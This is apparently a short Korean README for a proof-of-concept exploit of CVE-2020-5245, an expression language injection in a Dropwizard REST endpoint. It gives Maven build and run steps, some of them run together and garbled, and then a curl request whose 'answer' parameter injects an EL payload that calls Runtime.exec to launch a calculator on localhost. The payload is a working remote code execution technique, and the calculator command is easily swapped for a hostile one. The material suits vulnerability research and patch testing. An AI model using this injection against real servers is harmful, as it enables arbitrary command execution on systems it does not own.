
CVE-2020-5245에 대한 개념 증명 익스플로잇으로, 조작된 HTTP 매개변수를 통해 Dropwizard REST 엔드포인트에서 표현식 언어 주입을 시연합니다.
mvn clean install을 실행하세요.java -jar target/dropwizard-1.0-SNAPSHOT.jar server config.yml로 애플리케이션을 시작하세요.http://localhost:8080 URL을 입력하세요.pom.xml에 일부 오류, 플러그인은 영향을 받지 않았습니다, 재현

curl http://localhost:8080/bookService/selfValidatingBeanParam?answer=${%27%27.getClass().forName(%22javax.script.ScriptEngineManager%22).newInstance().getEngineByName(%22JavaScript%22).eval(%22java.lang.Runtime.getRuntime().exec(%27/usr/bin/gnome-calculator%27)%22)}